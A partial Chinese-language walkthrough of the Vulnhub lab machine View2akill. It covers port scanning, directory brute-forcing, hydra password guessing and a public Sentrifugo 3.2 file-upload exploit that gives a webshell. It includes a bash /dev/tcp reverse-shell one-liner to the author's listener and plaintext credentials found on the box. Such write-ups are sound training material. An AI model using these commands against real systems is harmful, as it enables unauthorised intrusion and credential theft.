Vulnhub之View2akill靶机测试过程(部分)
View2akill
识别目标主机IP地址
(kali㉿kali)-[~/Desktop/Vulnhub/View2akill]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:8a:ef:1d 1 60 PCS Systemtechnik GmbH
192.168.56.206 08:00:27:bb:ed:83 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.206
NMAP扫描
┌──(kali㉿kali)-[~/Desktop/Vulnhub/View2akill]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.206 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-02 21:51 EST
Nmap scan report for bogon (192.168.56.206)
Host is up (0.00012s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 54:8e:3a:14:b2:be:03:5c:d4:08:3a:ed:bb:e1:55:53 (RSA)
| 256 aa:be:cb:e1:b6:7f:47:75:29:f7:63:e5:f9:39:78:2e (ECDSA)
|_ 256 de:1c:31:e0:15:4d:f5:dc:8e:bc:3c:e4:7d:64:75:54 (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: rain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=rain
| Subject Alternative Name: DNS:rain
| Not valid before: 2019-07-22T22:11:20
|_Not valid after: 2029-07-19T22:11:20
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-robots.txt: 4 disallowed entries
|_/joomla /zorin /dev /defense
|_http-title: A View To A Kill
|_http-server-header: Apache/2.4.29 (Ubuntu)
8191/tcp open http PHP cli server 5.5 or later
|_http-title: electronic controller app
MAC Address: 08:00:27:BB:ED:83 (Oracle VirtualBox virtual NIC)
Service Info: Host: rain; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.54 seconds
NMAP扫描结果表明目标主机有4个开放端口:22(ssh)、25(smtp)、80(http)、8191(http)
获得Shell
端口8191
┌──(kali㉿kali)-[~/Desktop/Vulnhub/View2akill]
└─$ nikto -h http://192.168.56.206:8191
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.206
+ Target Hostname: 192.168.56.206
+ Target Port: 8191
+ Start Time: 2023-03-02 21:54:28 (GMT-5)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-18114: /reports/rwservlet?server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF: Oracle Reports rwservlet report Variable Arbitrary Report Executable Execution
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 20 error(s) and 4 item(s) reported on remote host
+ End Time: 2023-03-02 21:54:52 (GMT-5) (24 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
┌──(kali㉿kali)-[~/Desktop/Vulnhub/View2akill]
└─$ gobuster dir -u http://192.168.56.206:8191 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh --exclude-length 167
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.206:8191
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] Exclude Length: 167
[+] User Agent: gobuster/3.4
[+] Extensions: php,html,txt,sh
[+] Timeout: 10s
===============================================================
2023/03/02 21:57:00 Starting gobuster in directory enumeration mode
===============================================================
Progress: 1102195 / 1102805 (99.94%)
===============================================================
2023/03/02 22:10:23 Finished
===============================================================
对端口8191的信息收集没有获得有价值的信息。
端口80
访问端口80,返回页面的源代码可知有目录/pics,访问该目录,该目录下有很多图片文件:
[ICO] Name Last modified Size Description
[PARENTDIR] Parent Directory -
[IMG] aview.gif 2019-10-19 15:06 6.6M
[SND] theme.mp3 2019-10-19 23:32 5.7M
[IMG] view1.jpg 2019-10-19 15:06 52K
[IMG] view2.png 2019-10-19 15:06 549K
[IMG] view3.gif 2019-10-19 15:06 964K
[IMG] view4.gif 2019-10-19 15:06 7.3M
[IMG] view5.gif 2019-10-19 15:06 1.0M
[IMG] view6.gif 2019-10-19 15:06 25M
[IMG] view7.gif 2019-10-19 15:06 8.3M
[IMG] view8.png 2019-10-19 15:55 141K
[IMG] view10.gif 2019-10-19 15:55 4.6M
[IMG] view11.gif 2019-10-19 15:55 7.3M
[IMG] view12.gif 2019-10-19 15:55 2.6M
[IMG] view13.gif 2019-10-19 15:55 16M
[IMG] view14.gif 2019-10-19 15:55 7.3M
[IMG] view15.gif 2019-10-19 15:55 20M
[VID] view15.webm 2019-10-19 23:40 4.7M
[ ] view20.webp 2019-10-26 12:23 1.6M
[ ] view21.webp 2019-10-26 12:23 1.5M
[IMG] view22.png 2019-10-19 15:06 549K
[IMG] viewBack.png 2019-10-19 23:30 142K
[IMG] viewCover.png 2019-10-19 23:26 1.2M
[IMG] viewa.png 2019-10-21 00:25 278K
[IMG] zorin.png 2019-10-19 23:26 140K
[IMG] zorin_max.png 2019-10-19 23:26 129K
zorin max是否为用户名?
┌──(kali㉿kali)-[~/Desktop/Vulnhub/View2akill]
└─$ curl http://192.168.56.206/robots.txt
User-agent: *
Disallow: /joomla
Disallow: /zorin
Disallow: /dev
Disallow: /defense
访问/joomla目录,没有有用的信息。
访问/zorin目录,没有有用的信息。
┌──(kali㉿kali)-[~/Desktop/Vulnhub/View2akill]
└─$ mv ~/Downloads/e_bkup.tar.gz .
┌──(kali㉿kali)-[~/Desktop/Vulnhub/View2akill]
└─$ ls
e_bkup.tar.gz nmap_full_scan
┌──(kali㉿kali)-[~/Desktop/Vulnhub/View2akill]
└─$ tar -zxvf e_bkup.tar.gz
New_Employee_Onboarding_Chuck.rtf
onboarding_email_template.rtf
Stop_Storing_Passwords.rtf
note_to_mail_admins.txt
┌──(kali㉿kali)-[~/Desktop/Vulnhub/View2akill]
└─$ ls -alh
total 32K
drwxr-xr-x 2 kali kali 4.0K Mar 2 22:22 .
drwxr-xr-x 65 kali kali 4.0K Mar 2 21:49 ..
-rw-r--r-- 1 kali kali 1.2K Mar 2 22:21 e_bkup.tar.gz
-rw-r--r-- 1 kali kali 795 Oct 20 2019 New_Employee_Onboarding_Chuck.rtf
-rw-r--r-- 1 root root 1.5K Mar 2 21:51 nmap_full_scan
-rw-r--r-- 1 kali kali 165 Oct 20 2019 note_to_mail_admins.txt
-rw-r--r-- 1 kali kali 302 Oct 20 2019 onboarding_email_template.rtf
-rw-r--r-- 1 kali kali 467 Oct 20 2019 Stop_Storing_Passwords.rtf
┌──(kali㉿kali)-[~/Desktop/Vulnhub/View2akill]
└─$ cat note_to_mail_admins.txt
Yo, wassup computer geeks! I was told by design to upload a few example emails for you nerds to work with in prep for what they called "email web gooey platform".
┌──(kali㉿kali)-[~/Desktop/Vulnhub/View2akill]
└─$ cat Stop_Storing_Passwords.rtf
{\rtf1\ansi{\fonttbl\f0\fswiss Helvetica;}\f0\pard All, I know you're close with Max, but you can't keep storing your credentials in txt files on your desktop! We already have had complaints of the apps inactivity auto logout feature, but 5 seconds is high enough in my professional opinion. Simply copy pasting credentials in the login fields is bad practice, even if password requirments are set to 32 characters minimun!
- Scarpine - Head of Security - CSO CIO}
┌──(kali㉿kali)-[~/Desktop/Vulnhub/View2akill]
└─$ cat onboarding_email_template.rtf
{\rtf1\ansi{\fonttbl\f0\fswiss Helvetica;}\f0\pard Greeting EMPLOYEE, We welcome you to the team! Please login to our HR mgmt portaland fill out your profile and Details. Login username: USERNAME@localhost.com and password is: PASSWORD. INSERT ORG SPECIFIC PHRASE, glad you joined the team EMPLOYEE! }
┌──(kali㉿kali)-[~/Desktop/Vulnhub/View2akill]
└─$ cat New_Employee_Onboarding_Chuck.rtf
{\rtf1\ansi{\fonttbl\f0\fswiss Helvetica;}\f0\pard Greeting Chuck, We welcome you to the team! Please login to our HR mgmt portal(which we spoke of) and fill out your profile and Details. Make sure to enter in the descrption of your CISSP under Training & Certificate Details since you mentioned you have it. I will be checking that section often as I need to fill out related paperwork. Login username: chuck@localhost.com and password is the lowercase word/txt from the cool R&D video I showed you with the remote detonator + the transmit frequency of an HID proxcard reader - so password format example: facility007. Sorry for the rigmarole, the Security folks will kill me if I send passwords in clear text. We make some really neat tech here at Zorin, glad you joined the team Chuck Lee! }
似乎这里可能是用户名和密码。
┌──(kali㉿kali)-[~/Desktop/Vulnhub/View2akill]
└─$ gobuster dir -u http://192.168.56.206 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.206
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Extensions: sh,php,html,txt
[+] Timeout: 10s
===============================================================
2023/03/02 22:26:47 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 194]
/.html (Status: 403) [Size: 279]
/pics (Status: 301) [Size: 315] [--> http://192.168.56.206/pics/]
/dev (Status: 301) [Size: 314] [--> http://192.168.56.206/dev/]
/robots.txt (Status: 200) [Size: 83]
/defense (Status: 301) [Size: 318] [--> http://192.168.56.206/defense/]
/joomla (Status: 301) [Size: 317] [--> http://192.168.56.206/joomla/]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1101683 / 1102805 (99.90%)
===============================================================
2023/03/02 22:30:58 Finished
利用ZAP工具发现了url:
http://192.168.56.206/sentrifugo
访问该目录,为用户登录界面。看来这是突破点,对这个目录进一步扫描:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/View2akill]
└─$ gobuster dir -u http://192.168.56.206/sentrifugo/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.206/sentrifugo/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Extensions: php,html,sh,txt
[+] Timeout: 10s
===============================================================
2023/03/02 22:46:35 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/index.php (Status: 200) [Size: 20556]
/data (Status: 301) [Size: 326] [--> http://192.168.56.206/sentrifugo/data/]
/public (Status: 301) [Size: 328] [--> http://192.168.56.206/sentrifugo/public/]
/patches (Status: 301) [Size: 329] [--> http://192.168.56.206/sentrifugo/patches/]
/upgrade.php (Status: 302) [Size: 1689] [--> index.php]
/success.php (Status: 302) [Size: 3] [--> index.php]
/application (Status: 301) [Size: 333] [--> http://192.168.56.206/sentrifugo/application/]
/logs (Status: 301) [Size: 326] [--> http://192.168.56.206/sentrifugo/logs/]
/error.php (Status: 302) [Size: 0] [--> index.php]
/sql (Status: 301) [Size: 325] [--> http://192.168.56.206/sentrifugo/sql/]
/LICENSE.txt (Status: 200) [Size: 35126]
/CHANGELOG.txt (Status: 200) [Size: 1400]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/Zend (Status: 301) [Size: 326] [--> http://192.168.56.206/sentrifugo/Zend/]
/UPGRADE.txt (Status: 200) [Size: 1753]
/Classes (Status: 301) [Size: 329] [--> http://192.168.56.206/sentrifugo/Classes/]
Progress: 1102611 / 1102805 (99.98%)
===============================================================
┌──(kali㉿kali)-[~/Desktop/Vulnhub/View2akill]
└─$ curl http://192.168.56.206/sentrifugo/CHANGELOG.txt
CHANGELOG Sentrifugo
====================
RELEASE 3.2
------------
Changes in Controllers
------------------------
./application/modules/exit/controllers/ExittypesController.php
./application/modules/exit/controllers/ConfigureexitqsController.php
./application/modules/exit/controllers/ExitprocsettingsController.php
./application/modules/exit/controllers/AllexitprocController.php
./application/modules/exit/controllers/ExitprocController.php
./application/modules/default/controllers/EmployeeController.php
./application/modules/default/controllers/LeavemanagementController.php
./application/modules/default/controllers/holidaydatesController.php
- ExittypesController.php
Management,hr can add,edit,delete exit types.
- ConfigureexitqsController.php
Management,hr can add,edit,delete questions for exit types.
- ExitprocsettingsController.php
Management,hr can configure managers for exit process.
- AllexitprocController.php
Configured managers can approve or reject exit process.
- ExitprocController.php
Employee can initiate exit process.He can check status of exit process.
Note: You can find the respective view files in below scripts:
./application/modules/exit/views/scripts
Changes in scripts
------------------------
./public/media/exit/js/expenses.js
./public/media/js/hrms.js
./public/media/css/style.css
./public/media/css/successstyle.css
可以知道CMS的版本为3.2
┌──(kali㉿kali)-[~/Desktop/Vulnhub/View2akill]
└─$ searchsploit Sentrifugo
-------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------- ---------------------------------
Sentrifugo 3.2 - 'assets' Remote Code Execution (Authenticated) | php/webapps/48997.py
Sentrifugo 3.2 - File Upload Restriction Bypass | php/webapps/47323.txt
Sentrifugo 3.2 - File Upload Restriction Bypass (Authenticated) | php/webapps/48955.py
Sentrifugo 3.2 - Persistent Cross-Site Scripting | php/webapps/47324.txt
Sentrifugo CMS 3.2 - Persistent Cross-Site Scripting | php/webapps/48446.txt
Sentrifugo HRMS 3.2 - 'deptid' SQL Injection | windows/webapps/45266.txt
Sentrifugo HRMS 3.2 - 'id' SQL Injection | php/webapps/48179.txt
Sentrifugo Version 3.2 - 'announcements' Remote Code Execution (Authenticated) | php/webapps/48998.py
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
但是大部分漏洞需要验证后才能使用。
尝试用户登录绕过语句,但均告失败。
从
┌──(kali㉿kali)-[~/Desktop/Vulnhub/View2akill]
└─$ cat New_Employee_Onboarding_Chuck.rtf
{\rtf1\ansi{\fonttbl\f0\fswiss Helvetica;}\f0\pard Greeting Chuck, We welcome you to the team! Please login to our HR mgmt portal(which we spoke of) and fill out your profile and Details. Make sure to enter in the descrption of your CISSP under Training & Certificate Details since you mentioned you have it. I will be checking that section often as I need to fill out related paperwork. Login username: chuck@localhost.com and password is the lowercase word/txt from the cool R&D video I showed you with the remote detonator + the transmit frequency of an HID proxcard reader - so password format example: facility007. Sorry for the rigmarole, the Security folks will kill me if I send passwords in clear text. We make some really neat tech here at Zorin, glad you joined the team Chuck Lee! }
知道email为:chuck@localhost.com
而根据提示密码为图片里的文字:
http://192.168.56.206/dev/remote_control.gif
密码:HELICOPTER,不过大写好像不对,应该是小写
看来提示不对,需要暴力破解密码。
┌──(kali㉿kali)-[~/Desktop/Vulnhub/View2akill]
└─$ hydra -l chuck@localhost.com -P /usr/share/wordlists/rockyou.txt 192.168.56.206 http-post-form "/sentrifugo/index.php/:username=^USER^&password=^PASS^:F=incorrect" -v
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-03 00:10:25
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://192.168.56.206:80/sentrifugo/index.php/:username=^USER^&password=^PASS^:F=incorrect
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[80][http-post-form] host: 192.168.56.206 login: chuck@localhost.com password: 12345
[STATUS] attack finished for 192.168.56.206 (waiting for children to complete tests)
[80][http-post-form] host: 192.168.56.206 login: chuck@localhost.com password: password
[80][http-post-form] host: 192.168.56.206 login: chuck@localhost.com password: iloveyou
[80][http-post-form] host: 192.168.56.206 login: chuck@localhost.com password: 12345678
[80][http-post-form] host: 192.168.56.206 login: chuck@localhost.com password: princess
[80][http-post-form] host: 192.168.56.206 login: chuck@localhost.com password: rockyou
[80][http-post-form] host: 192.168.56.206 login: chuck@localhost.com password: 123456789
[80][http-post-form] host: 192.168.56.206 login: chuck@localhost.com password: 123456
[80][http-post-form] host: 192.168.56.206 login: chuck@localhost.com password: nicole
[80][http-post-form] host: 192.168.56.206 login: chuck@localhost.com password: 1234567
[80][http-post-form] host: 192.168.56.206 login: chuck@localhost.com password: monkey
[80][http-post-form] host: 192.168.56.206 login: chuck@localhost.com password: abc123
[80][http-post-form] host: 192.168.56.206 login: chuck@localhost.com password: jessica
[80][http-post-form] host: 192.168.56.206 login: chuck@localhost.com password: babygirl
[80][http-post-form] host: 192.168.56.206 login: chuck@localhost.com password: lovely
[80][http-post-form] host: 192.168.56.206 login: chuck@localhost.com password: daniel
1 of 1 target successfully completed, 16 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-03 00:10:28
居然破解出很多密码,这个方向可能是有问题的。
┌──(kali㉿kali)-[~/Desktop/Vulnhub/View2akill]
└─$ nikto -h http://192.168.56.206/sentrifugo/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.206
+ Target Hostname: 192.168.56.206
+ Target Port: 80
+ Start Time: 2023-03-03 00:11:37 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3268: /sentrifugo/data/: Directory indexing found.
+ OSVDB-3092: /sentrifugo/data/: This might be interesting...
+ OSVDB-3268: /sentrifugo/logs/: Directory indexing found.
+ OSVDB-3092: /sentrifugo/logs/: This might be interesting...
+ OSVDB-3268: /sentrifugo/public/: Directory indexing found.
+ OSVDB-3092: /sentrifugo/public/: This might be interesting...
+ OSVDB-3268: /sentrifugo/sql/: Directory indexing found.
+ OSVDB-3092: /sentrifugo/UPGRADE.txt: Default file found.
+ OSVDB-3092: /sentrifugo/LICENSE.txt: License file found may identify site software.
+ OSVDB-3092: /sentrifugo/CHANGELOG.txt: A changelog was found.
+ OSVDB-3092: /sentrifugo/.git/index: Git Index file may contain directory listing information.
+ /sentrifugo/.git/HEAD: Git HEAD file found. Full repo details may be present.
+ /sentrifugo/.git/config: Git config file found. Infos about repo details may be present.
+ /sentrifugo/CHANGELOG.txt: Version number implies that there is a SQL Injection in Drupal 7, can be used for authentication bypass (Drupageddon: see https://www.sektioneins.de/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html).
发现了/.git目录
─(kali㉿kali)-[~/Desktop/Toolsets/GitHack-master]
└─$ python2 GitHack.py http://192.168.56.206/sentrifugo/.git/
Githack没有啥发现。
还是回到前面得到的邮箱和密码,只是密码不对:
前面文件提示说the transmit frequency of an HID proxcard reader,线索(hint)就是transmit frequency和HID,结合到/dev目录下的文件,就是HID6005.pdf,打开这个文件(就两页),开始找transmit frequency关键词,看到有125 kHz
所以密码应该是:现在组合HELICOPTER和125 kHz,根据lowercase word/txt和password format example: facility007,得到最终的密码为:helicopter125
成功登陆,结合exploitdb的漏洞信息,
┌──(kali㉿kali)-[~/…/GitHack-master/dist/192.168.56.206/.git]
└─$ searchsploit -m php/webapps/48955.py
Exploit: Sentrifugo 3.2 - File Upload Restriction Bypass (Authenticated)
URL: https://www.exploit-db.com/exploits/48955
Path: /usr/share/exploitdb/exploits/php/webapps/48955.py
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/Toolsets/GitHack-master/dist/192.168.56.206/.git/48955.py
┌──(kali㉿kali)-[~/…/GitHack-master/dist/192.168.56.206/.git]
└─$ mv 48955.py exploit.py
┌──(kali㉿kali)-[~/…/GitHack-master/dist/192.168.56.206/.git]
└─$ python exploit.py --target http://192.168.56.206/sentrifugo --user chuck@localhost.com --password helicopter125
[~] Logging in
[+] Logged in
[~] Exploiting
[!] Spawning shell
www-data@view$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@view$ ls -alh
total 16K
drwxrwxr-x 2 www-data www-data 4.0K Mar 3 13:08 .
drwxrwxr-x 17 www-data www-data 4.0K Jul 26 2019 ..
-rw-r--r-- 1 www-data www-data 31 Mar 3 13:08 1677848909_3_shell.php
-rwxrwxr-x 1 www-data www-data 100 Jul 26 2019 info.TXT
www-data@view$ cat info.TXT
Folder accepts only pdf,docs and images(png,jpeg,gif)
Upload File Size depends on PHP configurtion.
www-data@view$ pwd
/var/www/html/sentrifugo/public/uploads/policy_doc_temp
www-data@view$ cd /home
www-data@view$ ls -alh
total 16K
drwxrwxr-x 2 www-data www-data 4.0K Mar 3 13:08 .
drwxrwxr-x 17 www-data www-data 4.0K Jul 26 2019 ..
-rw-r--r-- 1 www-data www-data 31 Mar 3 13:08 1677848909_3_shell.php
-rwxrwxr-x 1 www-data www-data 100 Jul 26 2019 info.TXT
www-data@view$ cd /tmp
www-data@view$ ls
1677848909_3_shell.php
info.TXT
www-data@view$ cd ..
www-data@view$ ls
1677848909_3_shell.php
info.TXT
www-data@view$
似乎这个shell有问题,不能切换目录,因此需要另外spawn一个shell出来:
www-data@view$ bash -c 'bash -i >& /dev/tcp/192.168.56.146/5555 0>&1'
┌──(kali㉿kali)-[~/Desktop/Vulnhub/View2akill]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.206] 43136
bash: cannot set terminal process group (1808): Inappropriate ioctl for device
bash: no job control in this shell
www-data@view:/var/www/html/sentrifugo/public/uploads/policy_doc_temp$ cd /tmp
</sentrifugo/public/uploads/policy_doc_temp$ cd /tmp
www-data@view:/tmp$ ls -alh
ls -alh
total 8.0K
drwxrwxrwt 2 root root 4.0K Mar 3 13:08 .
drwxr-xr-x 23 root root 4.0K Oct 25 2019 ..
www-data@view:/tmp$
这样就得到比较正常的shell了。
www-data@view:/home/jenny$ unzip dsktp_backup.zip
unzip dsktp_backup.zip
Archive: dsktp_backup.zip
inflating: passswords.txt
inflating: todo.txt
www-data@view:/home/jenny$ ls -alh
ls -alh
total 32K
drwxrwxrwx 2 jenny jenny 4.0K Mar 3 13:16 .
drwxr-xr-x 6 root root 4.0K Oct 27 2019 ..
-rw-r--r-- 1 jenny jenny 220 Oct 20 2019 .bash_logout
-rw-r--r-- 1 jenny jenny 3.7K Oct 20 2019 .bashrc
-rw-r--r-- 1 jenny jenny 807 Oct 20 2019 .profile
-rw-r--r-- 1 jenny jenny 845 Oct 25 2019 dsktp_backup.zip
-rwxrwxr-x 1 www-data www-data 104 Oct 20 2019 passswords.txt
-rwxrwxr-x 1 www-data www-data 669 Oct 25 2019 todo.txt
www-data@view:/home/jenny$ cat todo.txt
cat todo.txt
TODO
-Give feedback to marketing on logo (it currently looks like the banner ouside a cheap Italian reseaurant!!)
-The Boss likes the original, so I guess we're keeping it :/
-Push final script to /home/max/aView.py
-Waiting on devs and mechanical eng. to finalize programs (no way for QA to test this one! Yikes!)
-Verify James Bond is MI6. They may be on to us.
-Security says they are trying to infltrate our servers, so they pushed out a new password policy.
-Head of Security said this policy will solve all security related problems after I confronted him about it.
-Make a habit of deleting pointless emails.
-Migrate needed desktop items to Linux server.
www-data@view:/home/jenny$ cat passwords.txt
cat passwords.txt
cat: passwords.txt: No such file or directory
www-data@view:/home/jenny$ cat passswords.txt
cat passswords.txt
hr mgmt - NO ACCESS ANYMORE
jenny@localhost.com
ThisisAreallYLONGPAssw0rdWHY!!!!
ssh
jenny
!!!sfbay!!!
www-data@view:/home/jenny$
这应该是jenny的密码,看是否可以ssh。
┌──(kali㉿kali)-[~/Desktop/Vulnhub/View2akill]
└─$ ssh jenny@192.168.56.206
The authenticity of host '192.168.56.206 (192.168.56.206)' can't be established.
ED25519 key fingerprint is SHA256:CeTXnkKiW73Oabh7afa/MIQc1vTuHjfy8M1/SXZS5Rk.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.206' (ED25519) to the list of known hosts.
jenny@192.168.56.206's password:
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-66-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri Mar 3 13:17:51 UTC 2023
System load: 0.1 Processes: 197
Usage of /: 69.9% of 11.75GB Users logged in: 0
Memory usage: 52% IP address for enp0s17: 192.168.56.206
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
181 packages can be updated.
0 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
jenny@view:~$ id
uid=1007(jenny) gid=1007(jenny) groups=1007(jenny)
jenny@view:~$ sudo -l
[sudo] password for jenny:
Sorry, user jenny may not run sudo on view.
jenny@view:~$
jenny@view:~$ cat /home/max/aView.py
#!/usr/bin/python
#
# executed from php app add final wrapper/scirpt here
print "waiting on engineers to tweak final code"
jenny@view:~$ ls -alh /home/max/aView.py
-rwxrwx--- 1 max jenny 124 Oct 26 2019 /home/max/aView.py
jenny用户可以修改aView.py文件
STRIVE FOR PROGRESS,NOT FOR PERFECTION
